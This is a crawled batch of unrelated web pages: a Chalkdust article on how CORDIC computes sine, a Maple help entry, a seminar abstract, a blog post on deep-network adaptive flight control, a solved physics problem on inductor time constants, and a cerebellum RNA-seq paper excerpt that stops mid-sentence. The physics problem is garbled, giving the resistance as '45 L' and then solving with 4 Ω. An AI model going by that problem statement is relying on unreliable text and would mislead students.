by the hypotenuse. Finding $\sin(40^\circ) \approx$ 6cm/10cm through measurement During the all-too-brief reign of the analogue calculator, you could effectively do this electro-mechanically by measuring the induction in a coil of wire angled $40^\circ$ out of phase with another coil — but unless your calculator was salvaged from the navigation computer of a 50s Boeing bomber aircraft, this is not how your calculator does it. Nor does your calculator consult tables of values painstakingly hand-derived from the angle addition and half-angle trigonometric identities, as was the norm for mathematicians, scientists, and engineers until the mid-century. If you’re like me, you assumed that modern calculators approximate sine and cosine with polynomial functions using techniques from calculus and analysis. (If you’re very like me, you told a high school student this in your first year of teaching, struggling to make the key ideas of Taylor series accessible without referencing calculus.) However, these algebraic approximations prove slow to converge. A sophisticated computer can take a shortcut by storing the old immense tables in memory and then Chebyshev-approximating to get the last few digits of accuracy. But what about your pocket or scientific calculator, or, for that matter, your TI graphing calculator — where adding that architecture would be an expensive hassle? ## A weirdly capitalised acronym Enter CORDIC, the COordinate Rotation DIgital Computer — an algorithm designed by Convair’s Jack Volder to exploit the strengths of the then-emerging digital computers to their fullest. The idea that Volder laid out in “Binary Computation Algorithms for Coordinate Rotation and Function Generation” is simple: Program the computer to be able to perform a set of progressively smaller rotations, which it can then apply on one of the points of a known right-angled triangle—say, the $45^\circ-45^\circ-90^\circ$ isosceles right triangle with hypotenuse $1$—until it reaches the angle, and thus the measurements, of desired triangle. Rotating a vertex to find $\sin(75^\circ) \approx 0.97\ldots/1$. By itself, this eliminates the need to store an immense table—roughly speaking, each new smaller rotation refines the result to an additional binary digit of accuracy, and all that needs to be stored are the instructions for rotating by that angle. Indeed, similar methods were used for those hand-generated tables: the method described so far is a geometric perspective on using the angle-sum trigonometric identities. Volder’s algorithm, however, doesn’t stop there. It adds in two crucial details that computers just adore: • Don’t choose your set of rotations by progressively halving the angle—choose them by halving their tangents: $\tan(45^\circ)=1$, $\tan(26.56\ldots^\circ)=\frac{1}{2}$, $\tan(14.03\ldots^\circ)=\frac{1}{4}$… • Instead of performing a true rotation, attach the side of a right triangle with the desired angle to the old hypotenuse, creating what Richard Parris calls a fan Building a fan to approximate a $40^\circ$- angle. Both of these refinements to the scheme would seem to make our lives more difficult; after all, we lose both the nice rational angles and the hypotenuse that stays obligingly fixed at length 1. We shall see, however, that the actual computations are more straightforward, and are even simpler in binary arithmetic. If you are particularly fond of transformation matrices, you can pause your reading right now to work out why this is on your own (or read it in Richard Parris’ excellent “Elementary Functions and Calculators“)—but if you’d like to see a more purely geometric explanation, read on! ## CORDIC: A geometric justification Let’s look at a simple example of these rules in action. Say we have a right-angled triangle with sides of length $a$, $b$, and $c$, following well-trod convention. Let $c$ be the hypotenuse, and let side $a$ be adjacent to an angle $\theta$: A right-angled triangle. We then attach to the hypotenuse a triangle with a tangent ratio of $\frac{1}{2}$—that is, such that the side opposite the angle $\varphi$ is half the length of the side next to it. This opposite side, then, has length $\frac{c}{2}$: Attaching a triangle with a tangent ratio of $\frac{1}{2}$. And what of the triangle we want—a right-angled triangle with angle $\theta+\varphi$? Consider a vertical drawn from the opposite angle of the new triangle, perpendicular to side $a$, and a horizontal from the opposite angle of the original triangle perpendicular to side $b$: A triangle with angle $\theta + \varphi$. We then have the marked congruent angles—so the right triangle created by the intersection of the vertical and the horizontal is similar to the original triangle, and indeed is simply a triangle half the size, rotated by $90^\circ$! Thus, the dimensions of a right triangle with angle $\theta+\varphi$ can be $a-\frac{b}{2}$ on the adjacent side, and $b+\frac{a}{2}$ on the opposite side: The side-lengths of the triangle with angle $\theta + \varphi$. Similarly, we find sides of $a+\frac{b}{2}$ and $b-\frac{a}{2}$ for the triangle with angle $\theta-\varphi$, and would find $b+\frac{a}{2^n}$ and $a-\frac{b}{2^n}$ if we had sought $\varphi$ with a tangent halved n times. The change in the side lengths will always be given by that little triangle, which — as its sides are constructed parallel to those of the original triangle — will always be similar to the original triangle, with its scale determined by the tangent ratio of the new triangle in the fan. ## What your calculator (maybe) does To build out the fan and track the coordinates of the point, we only need to repeat this little divide-and-add process until we get close enough to the desired angle. For a binary computer, this is easy. Dividing by two is a simple matter of moving the decimal over by one place; dividing by $2^n$, moving the decimal point over by $n$ places. Many simpler calculators use binary-coded decimal instead of pure binary—storing each digit of a decimal number individually in binary representation—which adds some wrinkles, but follows fundamentally the same principle. All that remains is addition. For calculation of the sine and cosine ratios, we need only one further piece of information: the length of the hypotenuse. Here the “fan” is helpful, especially if we make one further proviso—we never leave an angle, or triangle, out. Then the component triangles of the fan are fixed, and in return for losing a bit of speed in narrowing in on the correct angle, we can have the computer memorise the length of the hypotenuse of the final, thinnest triangle in the fan—that same line will be the hypotenuse of the desired triangle! Let us walk through this process, in binary, with the example a four-step fan for $40^\circ$ illustrated above. We start with an isosceles right triangle with legs of length 1. This gives us our initial coordinates $\left(x_0,y_0\right)$ of $\left(1,1\right)$. We then subtract the the half-tangent right triangle, about $26^\circ$ (below, a subscript “$d$” indicates the number is in base-10): $x_1 = x_0+\frac{y_0}{2_d^{1_d}} = 1+\frac{1}{2_d} = 1+0.1=1.1$ $y_1 = y_0-\frac{x_0}{2_d^{1_d}} = 1-\frac{1}{2_d} = 1-0.1 = 0.1$ Then we add the quarter-tangent triangle, about $14^\circ$: $x_2 = x_1-\frac{y_1}{2_d^{2_d}} =1.1-\frac{0.1}{4_d}= 1.1-0.001=1.011$ $y_2 = y_1+\frac{x_1}{2_d^{2_d}} =0.1+\frac{1.1}{4_d} = 0.1+0.011 = 0.111$ And finally, we add the eighth-tangent triangle, or about $7^\circ$, to arrive at an angle of $39.6^\circ$: $x_3 = x_2-\frac{y_2}{2_d^{3_d}} =1.011-\frac{0.111}{8_d}= 1.011-0.000111=1.010001$ $y_3 = y_2+\frac{x_2}{2_d^{3_d}} =0.111+\frac{1.011}{8_d} = 0.111+0.001011 = 1.000011$ Transitioning back into decimal, this gives us an $x$-coordinate of about 1.27 and a $y$-coordinate of about 1.047. Repeated application of the Pythagorean theorem, meanwhile, tells us that the length of the hypotenuse of the eighth-tangent triangle—shared by the hypotenuse of the combined $39.6^\circ$ triangle—is about 1.64. So, $\sin(40^\circ)\approx \frac{1.047}{1.64} = 0.638$. This is pretty close to the actual three-place value of 0.643—but it should be noted that $40^\circ$ is one of the more convenient angles to reach in this fashion. A more usual implementation of CORDIC would be set to halve the tangent twenty or thirty times to ensure accuracy past five decimal places. So, we can calculate since and cosine with only one computationally costly task: dividing by a set number at the end. Those computational costs, though, have been decreasing, and CORDIC’s clever algorithmic thriftiness has begun to fall from favour. Intel’s CPUs haven’t used CORDIC since the days of the 486, and even some modern graphing calculators have dropped the method in favour of the polynomial approach. But even though CORDIC may someday cease to be a tool people use themselves, its incredible simplicity, cheap implementation, and proven accuracy will keep it in use in dedicated processors and purpose-built machines for as long as speciality electronics needs to know how to measure triangles. ## An exercise for the reader As the hyperbolic trigonometric functions share many basic properties with their circle-trigonometric counterparts, it may come as little surprise that CORDIC can also evaluate $\sinh$, $\cosh$, $\tanh$, and the rest of the hyperbolic ratios — though values on hyperbola can shift fast enough to leave ‘gaps’ that hyperbolic-tangent–halving alone can’t reach. Curiously, though, the fact that $\cosh(x)+\sinh(x)=e^x$ means that the basic CORDIC method can even be adapted to evaluate exponents and logarithms. If you can describe a geometric justification for the hyperbolic, exponential, or logarithmic variants like the circular case above, please let me know — I’m tired of looking at matrices. # Counting all the numbers between zero and one Heavy as the setting sun Oh, I’m counting all the numbers between zero and one Happy, but a little lost Well, I don’t know what I don’t know so I’ll kick my shoes off and run Sir Sly, &Run There’s a song popular on the radio right now (‘&Run’ by Sir Sly) that contains the lyric, “I’m counting all the numbers between zero and one.” The first time I heard it, I thought, that’s not going to take very long. I assumed the singer was referring to integers, of which there are none strictly between zero and one. Was he trying to tell the woman he was singing to that he was impatient to see her again? Or suggesting that they were as close as two adjacent integers, with literally nothing keeping them apart? The second time I heard the song, though, it occurred to me that he might be referring to the real numbers, of which there are an infinite number between zero and one. Counting those would keep him busy for, well, ever. Was he expressing his (infinite) patience? Or was he in despair at an impossible task? It all depends on what Sir Sly means by ‘numbers.’ (Also ‘counting’, and even ‘between’.) Continue reading # Unknown pleasures: pulsars and the first data revolution Many of the 20th century’s most famous albums are as celebrated for their artwork as they are for their music. This is particularly true of albums from the 1970’s: think of Bowie’s Aladdin Sane,  Fleetwood Mac’s Rumours, or Pink Floyd’s Dark side of the moon. The 1970’s were a golden era for concept albums in popular music, meaning that the world’s biggest artists spent a lot of time and money producing beautiful covers to fit the sound and message of the songs within. A recurring theme in artistic images from that decade is space. In the age of the moon landing, when much of technological development was focused on pushing the human frontier, cosmic images were everywhere in popular culture. The original Star Trek series was first broadcast in 1966, the first Star Wars film was released in 1977, and E.T. followed five years later. Similarly, Parliament’s Mothership connection (1975) and Supertramp’s Crime of the century (1974) both feature space-inspired covers. With space comes science, so it’s no surprise that many of the most famous album covers have an interesting scientific tale to tell. One spacey image with a particularly rich backstory comes from Joy Division’s 1979 debut, Unknown pleasures. The cover of the album features an array of wavy, organic-looking lines on a black background, with no information suggesting where they might come from. (Neither the title of the album nor the name of the artist appears on the front cover.) In fact the image is a ‘stacked plot’ depicting radiation emitted by a pulsar, a type of star that had been discovered 12 years earlier, and gives a glimpse into the transformative effect that early computers had on scientific research. The cover of Unknown pleasures. # Talkdust, episode 4 It’s time for episode four of Talkdust! You can listen to the podcast using the player below, or download an mp3, or search for us in your in favourite podcast app (or add us to your app manually using the RSS feed). The presenters of this episode of Talkdust are Sean Jamshidi and Eleanor Doman. Music and editing by Matthew Scroggs, and announcements by Tom Rivlin. In this episode: • Eleanor and Sean talk about the launch of issue 09. • Eleanor and Sean talk some more about the launch of issue 09. • Eleanor and Sean play a game in which they try to describe mathematical words to each other and take the second place position on the leaderboard. # The scutoid: a geometric building block of life It is not uncommon for a juicy piece of mathematics to crop up in a seemingly unexpected place — such as in the building blocks of multicellular life: epithelial cells. In June 2018 it was in the realms of cellular biology that a new geometric solid, previously unknown to mathematicians, was discovered. Behold, the scutoid! Our latest edition, Issue 09, is available now. Enjoy the articles online or scroll down to view the magazine as a PDF. ## Features • ### When Truchet met Chladni Stephen Muirhead meets neither, as he explores waves, tiles and percolation theory • ### Playing billiards with cue-bics Yuliya Nesterova misses all the pockets, but does manage to solve some cubics • ### Hiding in plain sight Axel Kerbec gets locked out while exchanging keys • ### In conversation with Matt Parker Interviewing Matt was a mistake • ### Oπnions: Can a horse have an Erdős number? Lucy Rycroft-Smith reflects on the use of this well-established measurement • ### On the cover: Harriss spiral Find out more about the spiral trees on the cover of Issue 09 • ### Bells, braids and taxicabs An adventure that starts with a morning of bell ringing and ends with a mad dash in a taxi • ### Counting caterpillars Peter Rowlett uses combinatorics to generate caterpillars • ### Striking the right chord How big are these random shapes? Submit an answer for a chance to win a prize! ## Fun • ### Prize crossnumber, Issue 09 Win £100 of Maths Gear goodies by solving our famously fiendish crossnumber • ### Dear Dirichlet, Issue 09 Coffee, Brexit and badgers are among the topics of discussion in this issue's Dear Dirichlet advice column • ### Horoscope, Issue 09 Mystic mug has some predictions for you... • ### Top Ten: Chalkdust regulars The definitive chart of the best Chalkdust regulars Your guide to creating the optimal homepage • ### What’s hot and what’s not, Issue 09 Fashion is fleeting, Chalkdust regulars are not. • ### Which symbol are you? Are you u or i? Am I? Who? • ### Top ten vote issue 09 Vote for your favourite Chalkdust issue • ### Page 3 model: Game of Thrones Using graph theory to predict who will sit the iron throne or
2019-09-19 12:29:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4285747706890106, "perplexity": 1078.4216428738118}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573519.72/warc/CC-MAIN-20190919122032-20190919144032-00014.warc.gz"}
https://jp.maplesoft.com/support/help/maple/view.aspx?path=type/radical
type/radical - Maple Programming Help # Online Help ###### All Products    Maple    MapleSim Home : Support : Online Help : Programming : Data Types : Type Checking : Types : type/radical type/radical check for fractional powers Calling Sequence type(expr, radical) Parameters expr - expression Description • The definition of type radical is that expr is of type ^ and op(2, expr) (the exponent) is of type fraction. Examples > $\mathrm{type}\left({2}^{\frac{1}{2}},\mathrm{radical}\right)$ ${\mathrm{true}}$ (1) > $\mathrm{type}\left({y}^{\frac{2}{5}},\mathrm{radical}\right)$ ${\mathrm{true}}$ (2) > $\mathrm{type}\left({y}^{3},\mathrm{radical}\right)$ ${\mathrm{false}}$ (3) > $\mathrm{type}\left(\mathrm{sqrt}\left({x}^{2}+{y}^{2}\right),\mathrm{radical}\right)$ ${\mathrm{true}}$ (4) See Also
2021-03-05 23:48:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 8, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9935576319694519, "perplexity": 9999.747754338756}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178373761.80/warc/CC-MAIN-20210305214044-20210306004044-00430.warc.gz"}
http://www.ms.unimelb.edu.au/research/seminars.php?id=915
# Some wonderful conjectures (but almost no theorems) at the boundary between analysis, combinatorics and probability #### by Alan Sokal Institution: University College London/New York University Date: Thu 29th July 2010 Time: 10:00 AM Location: Old Geology Theatre 1, The University of Melbourne Abstract: I discuss some analytic and combinatorial properties of the entire function $F(x,y) = \sum\limits_{n=0}^\infty \frac{x^n}{n!} y^{n(n-1)/2}$. This function (or formal power series) arises in numerous problems in enumerative combinatorics, notably in the enumeration of connected graphs.
2017-10-17 06:04:01
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6066895723342896, "perplexity": 4739.644798901495}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187820927.48/warc/CC-MAIN-20171017052945-20171017072945-00013.warc.gz"}
https://girishvjoshi.github.io/gj_blog/dmrac/update/2019/12/18/Deep-Model-Reference-Adaptive-Control.html
## Abstract: We present a new neuroadaptive architecture: Deep Neural Network-based Model Reference Adaptive Control (DMRAC). Our architecture utilizes the power of deep neural network representations for modeling significant nonlinearities while marrying it with the boundedness guarantees that characterize MRAC based controllers. We demonstrate that DMRAC can subsume previously studied learning-based MRAC methods, such as concurrent learning and GP-MRAC. This makes DMRAC a highly powerful architecture for high-performance control of nonlinear systems with long-term learning properties. please refer to post Model Reference Adaptive Control for basics of MRAC ## Introduction One significant design choice in MRAC architecture is the selection of feature vector for unstructured uncertainty case. In Model Reference Adaptive Control article, we showed empirically that the choice of the feature vector in the adaptive element directly affected the system capability to approximate the uncertainties. Using system state $$x(t)$$ as features resulted in a very poor estimate of uncertainty, and reference tracking, whereas RBF feature need operating domain knowledge for hyperparameter tuning. To alleviate this issue, Chowdhary et al. presented a Gaussian Process Model Reference Adaptive Controller. Gaussian Process (GP)-MRAC utilizes a GP as a model of uncertainty. A GP is a Bayesian nonparametric adaptive element that can adapt both its weights and the structure of the model in response to the data. GP-MRAC has strong long-term learning properties as well as high control performance (Refer Gaussian Process Model Reference Adaptive Controller with Generative Network). However, GPs can be viewed as “shallow” machine learning models, and do not utilize the power of learning complex features through compositions as deep networks do. Hence, one wonders whether the power of deep learning could lead to even more powerful learning-based MRAC architectures than those utilizing GPs. Deep Neural Networks (DNN) have lately shown tremendous empirical performance in many applications, including fields such as computer vision, speech recognition, translation, natural language processing, Robotics, Autonomous driving, and many more. Unlike their counterparts, such as Gaussian Radial Basis Function networks, deep networks learn features by learning the weights of nonlinear compositions of weighted features arranged in a directed acyclic graph. It is now pretty clear that deep neural networks are outshining heuristic-based regression and classification algorithms as well as RBFNs, GPs, Single Hidden layer-NNs, and other classical machine learning techniques. However, their utility in the context of control, and especially safety-critical control, which requires stability guarantees, has been an open question. This article presents a control architecture and flight test results of Deep Neural Network MRAC (DMRAC). However, for the details of DMRAC controller, the algorithm for the online update of the weights of the DNN by utilizing a dual time-scale adaptation scheme, stability guarantees and Uniform Ultimate Boundedness (UUB) of the entire DMRAC controller refer to our paper Deep Model Reference Adaptive Control DMRAC controller aims to enforce the unknown nonlinear dynamic system to track a designed reference model given as \begin{align*} \dot{x}(t) &= f(x)+Bu(t) \\ \dot{x}_{rm}(t) &= A_{rm}x_{rm}(t)+B_{rm}r(t) \end{align*} Where $$x(t) \in \mathcal{D}_x \in \mathbb{R}^n$$, $$u(t) \in \mathbb{R}^m$$ and $$f: \mathbb{R}^n \rightarrow \mathbb{R}^n$$ is Lipschitz. The control is designed to be of the form $$u(t) = -kx(t)+k_gr(t)-\nu_{ad}$$, Where $$k, k_g$$ are designed to satisfy the following matching condition $$A_{rm} = A-Bk, B_{rm}=Bk_g$$ DMRAC model uncertaintaties as deep neural network, \begin{align*} \nu_{ad}(x) = W^T\phi_n(\theta_{n-1},\phi_{n-1}(\theta_{n-2},\phi_{n-2}(...)))) \end{align*} We separate the network weights as outer layer weights $$W$$ and inner-layer weights $$\theta_n$$. The inner layer weights are updated using stochastic gradient descent over replay buffer collected over previous data. $$L(\boldsymbol{Z, \theta}) = \frac{1}{M}\sum_i^M \ell(\boldsymbol{Z_i, \theta}) \label{empirical_loss}$$ \boldsymbol{\theta}_{k+1} = \label{SGD2} Where $$L(\boldsymbol{Z, \theta})$$ empirical estimate of $$\ell_2$$ cost function over data. The outer layer weights of DMRAC are updated using MRAC rule. \begin{align*} \dot{W} = -\Gamma\phi_n(x)e(t)^TPB \end{align*} The total controller flow diagram is as follows, and further details can be found in Deep Model Reference Adaptive Control ## Flight Results We used an off the shelf available Parrot Mambo Quadrotor to experiment with DMRAC control architecture in the VICON facility at the University of Illinois CSL Illinois Robotics Lab. ### Cross Wind Disturbance In this experiment the controller is tasked to maintain a circular trajectory tracking under a cross wind. We attached a cloth underneath the quadrotor, under the cross wind flapping of this cloth introduced nonlinear disturbance torque on the vehicle apart from side ward force from cross wind. The controller task is to track the trajectory under cross winds. ### Fault Tolerant Control In this experiment the controller handles a rotor blade breaking in middle of the flight (Listen to rotor breaking!!). The quadrotor is commanded to maintian a altitude of 1 meter above ground level. The rotor blade breaks in middle of flight and controller task is to maintain the altitude despite the fault.
2022-09-26 09:02:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.6826871037483215, "perplexity": 1705.8923780194311}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334855.91/warc/CC-MAIN-20220926082131-20220926112131-00371.warc.gz"}
http://clay6.com/qa/33419/a-uniformly-would-soleacidal-ie-of-self-inductance-8-times-10-h-and-resista
Browse Questions # A uniformly would soleacidal (ie) of self inductance $8 \times 10^{-4}\;H$ and resistance $45\;L$ is broken into two identical coils. These colis are then connected in parallel across a battery of $10V$ of negligible resistance the time constant for this circuit is $(a)\;4 \times 10^{-4}\;S \\ (b)\;\frac{1}{2} \times 10^{-4}\;S \\(c)\;2 \times 10^{-4}\;S \\(d)\;1 \times 10^{-4}\;S$ When a srteroid is cut it two parts the self inductance and resistance will become half. $L$ for each part $= \large\frac{8 \times 10^{-4}}{2} $$=4 \times 10^{-4}\;H R for each part =2 \Omega When they are connected in parallel the effective inductance L= \large\frac{4 \times 10^{-4}}{2} \qquad= 2 \times 10^{-4}\;H effective R=\large\frac{2}{2}$$ \;\Omega=1 \Omega$ The time constant $T= \large\frac{L}{R}$ $\qquad= \large\frac{2 \times 10^{-4}}{1}$ $\qquad= 2 \times 10^{-4}$ Hence c is the correct answer.
2017-04-24 01:32:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9993267059326172, "perplexity": 2420.407904226609}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917118950.30/warc/CC-MAIN-20170423031158-00087-ip-10-145-167-34.ec2.internal.warc.gz"}
https://www.nature.com/articles/s41586-021-03220-z
Main The cerebellar cortex is composed of the same basic circuit replicated thousands of times. Mossy fibres from many brain regions excite granule cells that in turn excite Purkinje cells (PCs), the sole outputs of the cerebellar cortex. Powerful climbing fibre synapses, which originate in the inferior olive, excite PCs and regulate synaptic plasticity. Additional circuit elements include inhibitory interneurons such as molecular layer interneurons (MLIs), Purkinje layer interneurons (PLIs), Golgi cells, excitatory unipolar brush cells (UBCs) and supportive Bergmann glia. There is a growing recognition that cerebellar circuits exhibit regional specializations, such as a higher density of UBCs or more prevalent PC feedback to granule cells in some lobules. Molecular variation across regions has also been identified, such as the parasagittal banding pattern of alternating PCs with high and low levels of Aldoc expression4. However, the extent to which cells are molecularly specialized in different regions is poorly understood. Achieving a comprehensive survey of cell types in the cerebellum poses some unique challenges. First, a large majority of the neurons are granule cells, making it difficult to accurately sample the rarer types. Second, for many of the morphologically and physiologically defined cell types—especially the interneuron populations—existing molecular characterization is extremely limited. Recent advances in single-cell RNA sequencing (scRNA-seq) technology1,2,3 have increased the throughput of profiling to enable the systematic identification of cell types and states throughout the central nervous system5,6,7,8. Several recent studies have harnessed such techniques to examine some cell types in the developing mouse cerebellum9,10,11, but none has yet comprehensively defined mature cell types in the adult. Identification of cerebellar cell types We developed a pipeline for high-throughput single-nucleus RNA-seq (snRNA-seq) with high transcript capture efficiency and nuclei yield, as well as consistent performance across regions of the adult mouse and post mortem human brain12 (https://doi.org/10.17504/protocols.io.bck6iuze; Methods). To comprehensively sample cell types in the mouse cerebellum, we dissected and isolated nuclei from 16 different lobules, across both female and male replicates (Fig. 1a, Extended Data Fig. 1a, Methods). We recovered 780,553 nuclei profiles with a median transcript capture of 2,862 unique molecular identifiers (UMIs) per profile (Extended Data Fig. 1b, c), including 530,063 profiles from male donors, and 250,490 profiles from female donors, with minimal inter-individual batch effects (Extended Data Fig. 1d, e). To discover cell types, we used a previously developed clustering strategy12 (Methods) to partition 611,034 high-quality profiles into 46 clusters. We estimate that with this number of profiles, we can expect to sample even extremely rare cell types (prevalence of 0.15%) with a probability of greater than 90%, which suggests that we captured most transcriptional variation within the cerebellum (Extended Data Fig. 1f). We assigned each cluster to one of 18 known cell type identities on the basis of the expression of specific molecular markers that are known to correlate with defining morphological, histological and/or functional features (Fig. 1b, c, Supplementary Table 1). These annotations were also corroborated by the expected layer-specific localizations of marker genes in the Allen Brain Atlas (ABA)13 (https://mouse.brain-map.org) (Fig. 1d). Several cell types contained multiple clusters defined by differentially expressed markers, which suggests further heterogeneity within those populations (Extended Data Fig. 2a–n, Supplementary Table 2). Cell type variation across lobules To quantify the regional specialization of cell types, we examined how our clusters distributed proportionally across each lobule. We found that eight of our nine PC clusters, as well as several granule cell clusters and one Bergmann glial cluster, showed the most significantly divergent lobule compositions (Pearson’s chi-squared test, false discovery rate (FDR) < 0.001; Methods) and exhibited greater than twofold enrichment in at least one lobule (Fig. 2a). There was high concordance in the regional composition of each of these types across replicates, which indicates consistent spatial enrichment patterns (Extended Data Fig. 3a). The nine PC clusters could be divided into two main groups on the basis of their expression of Aldoc, which defines parasagittal striping of Purkinje neurons across the cerebellum4. Seven of the nine PC clusters were Aldoc-positive, indicating greater specialization in this population compared with the Aldoc-negative PCs. Combinatorial expression of Aldoc and at least one subtype-specific marker fully identified the Purkinje clusters (Fig. 2b). These Aldoc-positive and Aldoc-negative groups showed a regional enrichment pattern that was consistent with the known paths of parasagittal stripes across individual lobules (Fig. 2c). When characterizing the spatial variation of the PC subtypes, we found some with spatial patterns that were recently identified using Slide-seq technology (Aldoc_1 and Aldoc_7, marked by Gpr176 and Tox2, respectively)14, as well as several undescribed subtypes and patterns (Fig. 2b, d, Extended Data Fig. 3b). Most of this PC diversity was concentrated in the posterior cerebellum, particularly the uvula and nodulus, consistent with these regions showing greater diversity in both function and connectivity15,16. We also observed regional specialization in excitatory interneurons and Bergmann glia. Among the five granule cell subtypes (Fig. 2e), three displayed cohesive spatial enrichment patterns (subtypes 1, 2 and 3) (Fig. 2f, Extended Data Fig. 3c). In addition, and consistent with previous work17, the UBCs as a whole were highly enriched in the posterior lobules (Extended Data Fig. 3d). Finally, we identified a Bergmann glial subtype that expressed the marker genes Mybpc114 and Wif1 (Fig. 2g), with high enrichment in lobule VI, the uvula and nodulus (Fig. 2h, Extended Data Fig. 3e). The regional specialization of interneuron and glial populations is in contrast to the cerebral cortex, where molecular heterogeneity across regions is largely limited to projection neurons5,7. Continuous variation within cell types Molecularly defined cell populations can be highly discrete—such as the distinctions between chandelier and basket interneuron types in the cerebral cortex6—or they can vary more continuously, such as the cross-regional differences among principal cells of the striatum7,18 and cortex5,7. The cerebellum is known to contain several canonical cell types that exist as morphological and functional continua, such as the basket and stellate interneurons of the molecular layer19. To examine continuous features of molecular variation in greater detail within interneuron types, we created a metric to quantify and visualize the continuity of gene expression between two cell clusters. In brief, we fit a logistic curve for differentially expressed genes along the dominant expression trajectory20, extracting the maximum slope (m) of the curve (Methods, Fig. 3a). We expect m values to be smaller for genes that are representative of more continuous expression variation (Fig. 3a). Our cluster analysis initially identified three populations of UBCs, similar in number to the two to four discrete types suggested by previous immunohistochemistry studies21,22,23,24. However, comparing m values across 200 highly variable genes within the UBC, Golgi cell and MLI populations suggested that in UBCs, many genes showed continuous variation (Fig. 3b), including Grm1, Plcb4, Calb2 and Plcb1 (Fig. 3c, d). Cross-species, integrative analysis12 with cerebellar cells derived from two post mortem human donors (Methods) revealed evolutionary conservation of the continuum (Extended Data Fig. 4a), with graded expression of many of the same genes, including Grm1 and Grm2 (Extended Data Fig. 4b). Functionally, UBCs have been classified on the basis of their response to mossy fibre activation. Discrete ON and OFF categories have previously been emphasized, although some properties of UBCs do not readily conform to these distinct categories21,25,26. Here we focused on whether the molecular gradients in the expression of metabotropic receptors readily translated to a continuum of functional properties. We pressure-applied glutamate and measured the spiking responses of UBCs with on-cell recordings, and then measured glutamate-evoked currents in the cell (Methods). In some cells, glutamate rapidly and transiently increased spiking and evoked a long-lasting inward current (Fig. 3e, top left). For other cells, glutamate transiently suppressed spontaneous firing and evoked an outward current (Fig. 3e, bottom left). Many UBCs, however, had more complex, mixed responses to glutamate; we refer to these as ‘biphasic’ cells. In one cell, for example, glutamate evoked a delayed increase in firing, 